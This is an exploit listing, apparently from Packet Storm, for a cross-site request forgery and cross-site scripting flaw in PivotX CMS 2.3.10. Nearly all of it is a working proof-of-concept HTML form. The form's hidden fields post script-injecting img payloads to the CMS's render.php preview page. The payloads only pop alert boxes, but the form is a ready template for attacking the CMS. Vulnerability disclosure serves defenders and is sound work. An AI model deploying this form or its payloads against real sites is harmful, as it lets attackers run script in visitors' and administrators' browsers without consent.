PivotX CMS 2.3.10 Cross Site Request Forgery / Cross Site Scripting

2016-02-11T00:00:00
ID PACKETSTORM:135714
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-02-11T00:00:00

Description

                                        
                                            `<!--  
=====================================================  
# PivotX CMS 2.3.10 - Csrf-Xss  
=====================================================  
# Vendor Homepage: www.mihalism.net  
# Date: 10/02/2016  
# Software Link : http://pivotx.net/files/pivotx_latest.zip  
# Version : 2.3.10  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/pivotx-xss-xsrf.txt  
=====================================================  
  
Exploit :  
!-->  
<form action="http://localhost/pv/pivotx/render.php?previewpage=true"  
method="post">  
<input type='hidden' name='title' value="</title><img src=x  
onmouseover='alert(1)'><a>">  
<input type='hidden' name='subtitle' value="<img src=x onmouseover='alert(2)'>">  
<input type='hidden' name='introduction' value="<img src=x  
onmouseover='alert(3)'>">  
<input type='hidden' name='body' value="<img src=x onmouseover='alert(4)'>">  
<input type='hidden' name='author' value="<img src=x onmouseover='alert(5)'>">  
<input type="submit" value="Attack">  
</form>  
<!--  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
-->  
`